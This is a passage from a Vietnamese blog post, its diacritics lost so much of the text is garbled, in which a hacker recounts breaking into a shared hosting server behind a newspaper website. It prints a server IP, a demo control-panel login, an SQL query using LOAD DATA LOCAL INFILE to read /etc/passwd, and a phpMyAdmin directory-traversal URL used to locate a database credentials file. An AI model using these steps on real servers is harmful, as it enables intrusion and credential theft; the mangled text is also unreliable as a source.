Jakarta Struts), nay mrro mi rnh ri c i cht, m tht ra l do hm nay ngi lt lt li my ci folder c ghi du *mt thi tung honh* hi trc, bt cht gp li mt ci file cng vui vui nn em y k cho mi ngi cng nghe. Hihi vui l chnh thi nhen.

    Mt pht cho lut chi: tt c cc thng tin v li bo mt trong bi vit ny u c thng bo cho nhng bn lin quan v n thi im ny th nhng l hng c sa cha. (trong bi vit ny c mt s on h cu thm). No chng ta cng bt u.... Hi 1: Ba bn tng la, chuyn nghip lm, dn amatuer lm sao hack ni! Mt ngy ti tri u thng 8 nm ngoi, ang ngi trong phng lm vic ta son Tui Tr, bt cht c ngi bc vo, h th ra l sp ph tng bin tp, i cng vi sp cn c hai ba ngi khc na, nghe ni l ng nghip bn bo Si Gn Gii Phng sang chi. "N gii thiu vi cc anh, hacker ca Tui Tr n", va ni sp va ch thng v mnh. Tri i, ngi mun cht! T trc ti gi, thng mrro s nht 2 chuyn (1) ai hi "eh bit hack Yahoo! Mail hng?" (2) b ngi ta ku l hacker. Thi bui g khng bit, *hacker* cn qu hn vng , mi nghe nhc ti ch *hacker*, mt ng bn SGGP nhy vo b vai, nhn chm chm vo mt thng mrro (coi coi n ging ngi khng?! ). "Chc li sp ku hack ci ny ci n na ri n", thng mrro thm chi ra. Y nh rng: - Hacker h? Ba no th hack ci www.sggp.org.vn xem, c hack thoi mi i, ph cho h cng c, hihi, bn anh cng ang mun lm li ci website . Ba nh bo va ni va ci nham nh. -Tri i, ng nghe sp em ni, em c bit hack hic g u. Thng mrro p ng tr li. -h ni chi thi, dn amatuer lm sao hack ni, ci website ca SGGP l do bn VDC lm y nh, chuyn nghip cc k, my ch bn xy 3-4 ci g, ci g, h nh ri bc tng la , bo mt cc k, t trc gi cha bao gi b tn cng g ht. Ba nh bo h hng khoe. C ci g ran rt nng l tai thng mrro. Va dt xe v nh, kha ca li, thng mrro lp tc chy ln m my tnh lin, "m kip, coi ba ci bc tng la n chc c no", thng mrro chi ra. "T te t te", ting modem gia m khuya nghe nh ting n lc huyn cm, nghe cng vui tai gh. "www.sggp.org.vn[enter]", trc tin phi xem xem ci website n ra sao . h mt site tin tc nh bao website khc, vit bng PHP, hihi, tn scriptname cng l tn ting Vit (doctintuc.php thay v nn l readnews.php), trnh by n gin, khng chuyn nghip lm c l do c lm t lu, theo nh li ng nh bo ni. Hh, li sp c chuyn vui, mt website bn ngoi lm thm kiu ny th bn trong chc cng c c vi ba ci fireware...giy, thng mrro ci. Ln Netcraft xem th ci server t no, "www.netcraft.com/whats". h mt my ch chy RedHat Linux 7.2 vi Apache 1.3.23/mod_php4. Hihi, software cng khng c *up2date* cho lm nh, h cng phi KISS (Keep It Simple, Stupid!), my lo admin thng tun th theo ci rule ny. Thi k, tnh sau, dn *amatuer* nh thng mrro

    khng c thi quen hack bng cc li software h thng, n thch hack bng li ca my thng admin v programmer *chuyn nghip* hn. Thao tc vi ba ci URL, n nhanh chng nhn ra website ny dng Oracle lm backend database. PHP v Oracle, mt s kt hp th v nh. Cha c nhiu kinh nghim hack cc Oracle database server nhng thng mrro ghi vo file sggp.org.vn.txt thng tin ny khi cn thit th dng n(hihi, mi mt ln lm chuyn g thng mrro iu ghi li vo mt file, v ci file m n gp li hm nay chnh l file sggp.org.vn.txt ny). nmap ch? Khoan vi . Gh thm bn Google t . Thng mrro g vo keyword VDC Hosting, website ny thu host VDC m, th vn may xem. h, hin ra ngay v tr th nht: TeleHosting <http://hosting.vnn.vn>. Th gh v chi xem c g th v khng. h, mt website trng cng c, trnh by gn gng. Lm mt s thao tc, thng mrro i tn file sggp.org.vn.txt li thnh hosting.vnn.vn.txt v ghi thm vo mt s thng tin(tt c thng tin ny iu c th c tm thy ngay Index v trn Netcraft): -Telehosting: <http://hosting.vnn.vn> - IP address: 203.162.96.70 (cng IP vi sggp.org.vn => shared hosting) -Apache/2.0.47 (Unix) PHP/4.3.0 JRun/4.0 mod_jk/1.2.3-dev on Linux -Control Panel: <http://hosting.vnn.vn/customers/> -Demo account: cpvdc2/demo Hihi, chuyn nghip nh, cho c demo account th h. Thng mrro th truy cp vo Control Panel bng ci account . Thng Control Panel cung cp mt s cng c qun l nh Cp nht thng tin, Gi th yu cu, FTP, FileManager, MySQL,WebmailHi b nhiu nh. Hh, coi b ngon n h. Thng mrro h hng nhy vo th ci FTP, *Permission denied*. Ti lt thng FileManager cng vy. Nhng ri v cu tinh cng n, thng MySQL cho php truy cp, hihi, n dn thng mrro n phpMyAdmin b cng c qun l MySQL. Coi nh xong na chng ng ri, thng mrro ci ha h . Thng mrro t tin nh vy l cng c l do, vi MySQL v phpMyAdmin, n c th lm c khi chuyn vi ci server ny. Bi n gin n c th chy c cc cu lnh query trn my ch ny ri. V li, phpMyAdmin version c nh th ny (2.3.2) th chc chn s c li, ai bit c nhiu khi may mn s c c li cho php n chy lnh trn server ny. Gi search li phpMyAdmin trc hay hack thng MySQL trc y? Sao khng lm song song nh, hihi, chc s c li hn. Ngh l lm, thng mrro m hai ca s browser ln (FYI, its Firefox), mt ci n nhy vo Bugtraq search vi t kha phpMyAdmin, mt ci n login vo phpMyAdmin vi account demo. Vo trong phpMyAdmin ri, nhanh nh c lp trnh sn, thng mrro g cu lnh query: CREATE TABLE test(id INT,text LONGTEXT); LOAD DATA LOCAL INFILE /etc/passwd INTO TABLE test FIELDS ESCAPE BY ; SELECT * FROM test;

    v enter, mt mn hnh hin y cc username c trong h thng hin ra ngay trc mt n, yahoo! Hihi, vi phpMyAdmin ny th thng mrro s c th c c nhiu file trong h thng lm h. Cn thn lu li cc thng tin ny, gi mc tiu l g?, thng mrro t hi. Phi upload c file ln hoc phi ly c username v passwd ca mt user trong h thng. N bt u phn tch. Vi mt ci my ch shared hosting nh th ny, chc chn s c trng hp username v passwd trng nhau. l mt hng. Hng th hai l truy cp vo database cha d liu v khch hng. Khi truy cp vo database ny c ri th mi chuyn s tr nn rt d dng, chc chn trong s c y username v passwd m thng mrro cn tm. Cc tay admin *chuyn nghip* ny th no cng s vit mt cng c qun l khch hng cho ring mnh, gi ch cn bit c MySQL username v passwd truy cp vo database l xong. M thng th username v passwd ny s c lu trong mt file config.php no , cc tay vit PHP vn thng lm vy. Hihi, vn duy nht cn li l lm sao bit ng dn ca file . Thng mrro quyt nh i theo hng th hai trc n gin v hng i ny coi b hp dn hn, mc d i theo hng th nht th c v s d dng hn. Gi lm g tip theo? h khoan, phi xem xem c tm c g bn Bugtraq hng . h cng c mt vi li, coi b khng nng lm, hnh nh ton XSS khng. Va nh tt ca s Bugtraq i (g ch thng mrro cng khng thch ba ci v ny lm) th mt ci li p vo mt thng mrro. phpMyAdmin XSS Vulnerabilities, Transversal Directory Attack , Information Encoding Weakness and Path Disclosures ( http://www.securityfocus.com/archive/1/325641 ). Path Disclosures v Transversal Directory Attack, hehe, v ny hay h. Lu li ng link xong, thng mrro click vo xem chi tit ci li. Ri xong, ht phim! Ci li Transversal Directory attack cho php c ni dung (bao gm file v subfolder) ca mt folder bt k trong h thng (chnh xc l folder no cho php user apache c). Nhanh chng li dng li ny, cng vi ci Path Disclosures, thng mrro g http://hosting.vnn.vn/Admin/db_details_imp...ath=/opt/daiweb <http://hosting.vnn.vn/Admin/db_details_importdocsql.php?submit_show=true&do=imp ort&docpath=/opt/daiweb> Hehe chnh nh mt ng trc mt mt ci file mang tn connect.php ng nh thng mrro d on. Li dng chiu LOAD DATA INFILE, v ht! --mrro. c xong bi vit ny bn c cm gic g ?? Vui khng ? Ti thy rt vui, n lm cho ti vn thy hacking rt vui nay li cng vui hn. Hacker ( hay nhng ngi bit hack) tht s VN khng my ai khi hack xong m vit tut li vui v th ny u. Trc y

    Huyremy c ln vit li qu trnh hack HVA nhng khng vui cho lm, v li Huy cng vit c mi 1 ci thi ....Khi no tm c bi vit no vui th ny ti s li gii thiu vi cc bn ! Chc vui v ! The End

    You might also like